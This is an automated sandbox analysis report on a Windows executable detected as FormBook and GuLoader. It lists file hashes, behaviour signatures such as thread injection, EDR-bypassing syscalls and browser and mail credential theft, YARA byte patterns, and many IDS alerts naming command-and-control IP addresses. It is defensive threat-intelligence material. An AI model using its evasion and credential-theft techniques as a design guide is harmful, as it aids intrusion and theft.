Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IMG_00991ORDER_FILES.exe

Overview

General Information

Sample name:IMG_00991ORDER_FILES.exe
Analysis ID:1499873
MD5:3e9713868f8c85ac3aea7fa6c1ae4387
SHA1:8c2862d76937d712b4d8cb7c891d23eda0af7abf
SHA256:0645a7ba3f25c2f398a13f9d0d6701e9d3602044f3045f1ca1d598e08e4cde82
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • IMG_00991ORDER_FILES.exe (PID: 5676 cmdline: "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe" MD5: 3E9713868F8C85AC3AEA7FA6C1AE4387)
    • IMG_00991ORDER_FILES.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe" MD5: 3E9713868F8C85AC3AEA7FA6C1AE4387)
      • DRCZnsuCMood.exe (PID: 4212 cmdline: "C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • Robocopy.exe (PID: 1404 cmdline: "C:\Windows\SysWOW64\Robocopy.exe" MD5: 6B2AE9D48535CE68D53D56E65248BB4C)
          • DRCZnsuCMood.exe (PID: 5096 cmdline: "C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4124 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x4a400:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x325bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 8 entries

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\Robocopy.exe", CommandLine: "C:\Windows\SysWOW64\Robocopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\Robocopy.exe, NewProcessName: C:\Windows\SysWOW64\Robocopy.exe, OriginalFileName: C:\Windows\SysWOW64\Robocopy.exe, ParentCommandLine: "C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe" , ParentImage: C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe, ParentProcessId: 4212, ParentProcessName: DRCZnsuCMood.exe, ProcessCommandLine: "C:\Windows\SysWOW64\Robocopy.exe", ProcessId: 1404, ProcessName: Robocopy.exe
        Timestamp:2024-08-27T17:49:38.600561+0200
        SID:2855464
        Severity:1
        Source Port:49849
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:47:24.671410+0200
        SID:2855464
        Severity:1
        Source Port:49818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:49:25.365375+0200
        SID:2855464
        Severity:1
        Source Port:49845
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:47:12.797775+0200
        SID:2050745
        Severity:1
        Source Port:49815
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:47:12.797775+0200
        SID:2855465
        Severity:1
        Source Port:49815
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:48:03.892087+0200
        SID:2050745
        Severity:1
        Source Port:49827
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:48:03.892087+0200
        SID:2855465
        Severity:1
        Source Port:49827
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:47:41.623663+0200
        SID:2855464
        Severity:1
        Source Port:49820
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:47:49.912809+0200
        SID:2050745
        Severity:1
        Source Port:49823
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:47:49.912809+0200
        SID:2855465
        Severity:1
        Source Port:49823
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:49:22.720571+0200
        SID:2855464
        Severity:1
        Source Port:49844
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:51:18.155260+0200
        SID:2855464
        Severity:1
        Source Port:49873
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:49:43.875794+0200
        SID:2050745
        Severity:1
        Source Port:49851
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:49:43.875794+0200
        SID:2855465
        Severity:1
        Source Port:49851
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:47:18.966070+0200
        SID:2855464
        Severity:1
        Source Port:49816
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:46:51.220148+0200
        SID:2855464
        Severity:1
        Source Port:49808
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:51:15.514252+0200
        SID:2855464
        Severity:1
        Source Port:49872
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:48:31.702585+0200
        SID:2855464
        Severity:1
        Source Port:49832
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:48:48.385538+0200
        SID:2855464
        Severity:1
        Source Port:49837
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:50:47.261723+0200
        SID:2050745
        Severity:1
        Source Port:49867
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:50:47.261723+0200
        SID:2855465
        Severity:1
        Source Port:49867
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:51:00.948919+0200
        SID:2855464
        Severity:1
        Source Port:49868
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:50:11.511466+0200
        SID:2855464
        Severity:1
        Source Port:49856
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:49:04.751068+0200
        SID:2855464
        Severity:1
        Source Port:49841
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:48:51.261825+0200
        SID:2855464
        Severity:1
        Source Port:49838
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:51:06.465760+0200
        SID:2855464
        Severity:1
        Source Port:49870
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:50:24.823365+0200
        SID:2855464
        Severity:1
        Source Port:49860
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:49:35.962800+0200
        SID:2855464
        Severity:1
        Source Port:49848
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:48:01.183325+0200
        SID:2855464
        Severity:1
        Source Port:49826
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:48:39.624597+0200
        SID:2050745
        Severity:1
        Source Port:49835
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:48:39.624597+0200
        SID:2855465
        Severity:1
        Source Port:49835
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:48:54.126206+0200
        SID:2050745
        Severity:1
        Source Port:49839
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:48:54.126206+0200
        SID:2855465
        Severity:1
        Source Port:49839
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:50:38.716431+0200
        SID:2855464
        Severity:1
        Source Port:49864
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:49:30.629004+0200
        SID:2050745
        Severity:1
        Source Port:49847
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:49:30.629004+0200
        SID:2855465
        Severity:1
        Source Port:49847
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:49:01.170461+0200
        SID:2855464
        Severity:1
        Source Port:49840
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:51:37.140534+0200
        SID:2050745
        Severity:1
        Source Port:49879
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:51:37.140534+0200
        SID:2855465
        Severity:1
        Source Port:49879
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:47:21.852343+0200
        SID:2855464
        Severity:1
        Source Port:49817
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:50:03.472155+0200
        SID:2855464
        Severity:1
        Source Port:49854
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:46:59.134782+0200
        SID:2050745
        Severity:1
        Source Port:49811
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:46:59.134782+0200
        SID:2855465
        Severity:1
        Source Port:49811
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:51:31.627647+0200
        SID:2855464
        Severity:1
        Source Port:49877
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:47:27.522168+0200
        SID:2050745
        Severity:1
        Source Port:49819
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:47:27.522168+0200
        SID:2855465
        Severity:1
        Source Port:49819
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:50:19.428943+0200
        SID:2050745
        Severity:1
        Source Port:49859
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:50:19.428943+0200
        SID:2855465
        Severity:1
        Source Port:49859
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:50:41.589299+0200
        SID:2855464
        Severity:1
        Source Port:49865
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:48:09.906772+0200
        SID:2855464
        Severity:1
        Source Port:49828
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:46:53.854859+0200
        SID:2855464
        Severity:1
        Source Port:49809
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:50:14.139128+0200
        SID:2855464
        Severity:1
        Source Port:49857
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:46:30.762152+0200
        SID:2050745
        Severity:1
        Source Port:49807
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:46:30.762152+0200
        SID:2855465
        Severity:1
        Source Port:49807
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:48:12.659988+0200
        SID:2855464
        Severity:1
        Source Port:49829
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:50:00.598770+0200
        SID:2855464
        Severity:1
        Source Port:49853
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:51:20.709819+0200
        SID:2855464
        Severity:1
        Source Port:49874
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:49:06.103987+0200
        SID:2855464
        Severity:1
        Source Port:49842
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:48:36.983232+0200
        SID:2855464
        Severity:1
        Source Port:49834
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:50:16.776730+0200
        SID:2855464
        Severity:1
        Source Port:49858
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:45:52.320809+0200
        SID:2803270
        Severity:2
        Source Port:49806
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic
        Timestamp:2024-08-27T17:50:27.509089+0200
        SID:2855464
        Severity:1
        Source Port:49861
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:47:47.146655+0200
        SID:2855464
        Severity:1
        Source Port:49822
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:47:07.386107+0200
        SID:2855464
        Severity:1
        Source Port:49813
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:47:04.678519+0200
        SID:2855464
        Severity:1
        Source Port:49812
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:50:06.272021+0200
        SID:2050745
        Severity:1
        Source Port:49855
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:50:06.272021+0200
        SID:2855465
        Severity:1
        Source Port:49855
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:49:57.726489+0200
        SID:2855464
        Severity:1
        Source Port:49852
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:50:44.450788+0200
        SID:2855464
        Severity:1
        Source Port:49866
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:51:09.232935+0200
        SID:2050745
        Severity:1
        Source Port:49871
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:51:09.232935+0200
        SID:2855465
        Severity:1
        Source Port:49871
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:47:58.613319+0200
        SID:2855464
        Severity:1
        Source Port:49825
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:51:28.877508+0200
        SID:2855464
        Severity:1
        Source Port:49876
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:48:34.331911+0200
        SID:2855464
        Severity:1
        Source Port:49833
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:46:56.492735+0200
        SID:2855464
        Severity:1
        Source Port:49810
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:51:23.417319+0200
        SID:2050745
        Severity:1
        Source Port:49875
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:51:23.417319+0200
        SID:2855465
        Severity:1
        Source Port:49875
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:47:44.402088+0200
        SID:2855464
        Severity:1
        Source Port:49821
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:50:32.911692+0200
        SID:2050745
        Severity:1
        Source Port:49863
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:50:32.911692+0200
        SID:2855465
        Severity:1
        Source Port:49863
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:49:41.237366+0200
        SID:2855464
        Severity:1
        Source Port:49850
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:47:10.100521+0200
        SID:2855464
        Severity:1
        Source Port:49814
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:47:55.970424+0200
        SID:2855464
        Severity:1
        Source Port:49824
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:48:15.429633+0200
        SID:2855464
        Severity:1
        Source Port:49830
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:49:09.211330+0200
        SID:2050745
        Severity:1
        Source Port:49843
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:49:09.211330+0200
        SID:2855465
        Severity:1
        Source Port:49843
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:48:18.187877+0200
        SID:2050745
        Severity:1
        Source Port:49831
        Destination Port:80
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-27T17:48:18.187877+0200
        SID:2855465
        Severity:1
        Source Port:49831
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:48:45.539362+0200
        SID:2855464
        Severity:1
        Source Port:49836
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:51:34.376523+0200
        SID:2855464
        Severity:1
        Source Port:49878
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:50:30.207492+0200
        SID:2855464
        Severity:1
        Source Port:49862
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:51:03.700384+0200
        SID:2855464
        Severity:1
        Source Port:49869
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:2024-08-27T17:49:27.990492+0200
        SID:2855464
        Severity:1
        Source Port:49846
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: IMG_00991ORDER_FILES.exeReversingLabs: Detection: 26%
        Source: Yara matchFile source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: IMG_00991ORDER_FILES.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: IMG_00991ORDER_FILES.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmp
        Source: Binary string: wntdll.pdbUGP source: IMG_00991ORDER_FILES.exe, 00000003.00000003.6754952143.0000000034FF4000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000003.6751963994.0000000034E4A000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: IMG_00991ORDER_FILES.exe, IMG_00991ORDER_FILES.exe, 00000003.00000003.6754952143.0000000034FF4000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000003.6751963994.0000000034E4A000.00000004.00000020.00020000.00000000.sdmp, IMG_00991ORDER_FILES.exe, 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe
        Source: Binary string: mshtml.pdbUGP source: IMG_00991ORDER_FILES.exe, 00000003.00000001.6547753417.0000000000649000.00000020.00000001.01000000.0000000D.sdmp
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C60
        Source: C:\Users\user\Desktop\IMG_00991ORDER_FILES.exeCode function: 0_2_004068B1 FindFirstFileW,FindClose,0_2_004068B1
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4x nop then mov ebx, 00000004h5_2_04D104DE

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 203.161.42.73:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49811 -> 76.223.67.189:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49811 -> 76.223.67.189:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49807 -> 154.23.184.218:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49807 -> 154.23.184.218:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49824 -> 35.244.245.121:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49810 -> 76.223.67.189:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49813 -> 203.161.42.73:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 76.223.67.189:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49815 -> 203.161.42.73:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49815 -> 203.161.42.73:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49837 -> 172.96.191.39:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49820 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49830 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49814 -> 203.161.42.73:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49818 -> 38.47.207.120:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49826 -> 35.244.245.121:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49822 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 76.223.67.189:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49817 -> 38.47.207.120:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49825 -> 35.244.245.121:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49838 -> 172.96.191.39:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49819 -> 38.47.207.120:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49819 -> 38.47.207.120:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49831 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49831 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49821 -> 194.58.112.174:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49828 -> 85.159.66.93:80
        Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49832 -> 3.82.56.39:80
        Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49823 -> 194.58.112.174:80
